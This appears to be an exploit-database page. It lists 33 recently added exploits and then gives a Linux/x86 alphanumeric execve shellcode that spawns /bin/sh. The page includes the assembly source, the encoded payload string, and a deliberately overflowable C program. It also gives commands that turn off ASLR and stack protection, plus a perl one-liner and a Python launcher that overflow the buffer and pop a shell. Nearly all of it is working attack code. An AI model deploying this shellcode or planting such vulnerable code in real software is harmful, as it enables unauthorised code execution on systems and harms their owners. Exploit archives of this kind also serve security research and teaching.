95c6eeab79
33 changes to exploits/shellcodes NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) SpotIE 2.9.5 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC) Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) TextCrawler Pro3.1.1 - Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC) Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC) RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC) NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC) Office Product Key Finder 1.5.4 - Denial of Service (PoC) SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC) SpotMSN 2.4.6 - 'Name' Denial of Service (PoC) SpotIM 2.2 - 'Name' Denial Of Service FTPGetter Professional 5.97.0.223 - Denial of Service (PoC) Duplicate Cleaner Pro 4 - Denial of Service (PoC) Microsoft Outlook VCF cards - Denial of Service (PoC) Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path Windows - Shell COM Server Registrar Local Privilege Escalation Dairy Farm Shop Management System 1.0 - 'username' SQL Injection Complaint Management System 4.0 - 'cid' SQL injection IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) Hostel Management System 2.0 - 'id' SQL Injection elaniin CMS 1.0 - Authentication Bypass Small CRM 2.0 - Authentication Bypass Voyager 1.3.0 - Directory Traversal Codoforum 4.8.3 - Persistent Cross-Site Scripting Django < 3.0 < 2.2 < 1.11 - Account Hijack Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
109 lines
No EOL
2.5 KiB
C
109 lines
No EOL
2.5 KiB
C
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
|
|
# Date: 2019-12-31
|
|
# Shellcode Author: bolonobolo
|
|
# Tested on: Linux x86
|
|
|
|
######################## execve.asm ###############################
|
|
global _start
|
|
|
|
section .text
|
|
_start:
|
|
|
|
; int 0x80 ------------
|
|
push 0x30
|
|
pop eax
|
|
xor al, 0x30
|
|
push eax
|
|
pop edx
|
|
dec eax
|
|
xor ax, 0x4f73
|
|
xor ax, 0x3041
|
|
push eax
|
|
push edx
|
|
pop eax
|
|
;----------------------
|
|
push edx
|
|
push 0x68735858
|
|
pop eax
|
|
xor ax, 0x7777
|
|
push eax
|
|
push 0x30
|
|
pop eax
|
|
xor al, 0x30
|
|
xor eax, 0x6e696230
|
|
dec eax
|
|
push eax
|
|
|
|
; pushad/popad to place /bin/sh in EBX register
|
|
push esp
|
|
pop eax
|
|
push edx
|
|
push ecx
|
|
push ebx
|
|
push eax
|
|
push esp
|
|
push ebp
|
|
push esi
|
|
push edi
|
|
popad
|
|
push eax
|
|
pop ecx
|
|
push ebx
|
|
|
|
xor al, 0x4a
|
|
xor al, 0x41
|
|
|
|
######################## ASCII string ##########################
|
|
|
|
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
|
|
|
|
########################## bof.c ####################
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char *argv[]){
|
|
char buffer[128];
|
|
strcpy(buffer, argv[1]);
|
|
return 0;
|
|
}
|
|
|
|
|
|
When you test it on new kernels remember to disable the
|
|
randomize_va_space and to compile the C program with execstack enabled
|
|
and the stack protector disabled
|
|
|
|
# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
|
|
# sysctl -p
|
|
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
|
|
bof.c -o bof
|
|
|
|
|
|
###################################################################
|
|
|
|
./bof `perl -e 'print "\x90"x48 .
|
|
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
|
|
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
|
|
|
|
The \x79\xf7\xff\xbf may change, you must find yourself an address in
|
|
the NOP befor the shellcode
|
|
|
|
#################### alpha.py ############################
|
|
|
|
#!/usr/bin/python
|
|
import os
|
|
|
|
print "[*] Loading NOP"
|
|
z = "\x90"*48
|
|
print "[*] Loading alphanumeric"
|
|
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
|
|
print "[*] Loading syscall"
|
|
z += "D"*16
|
|
print "[*] Loading JMP and landing address"
|
|
z += "\xff\xe4\x79\xf7\xff\xbf"
|
|
print "[*] Popping the shell..."
|
|
os.system("./bof " + z)
|
|
|
|
|
|
################################################################## |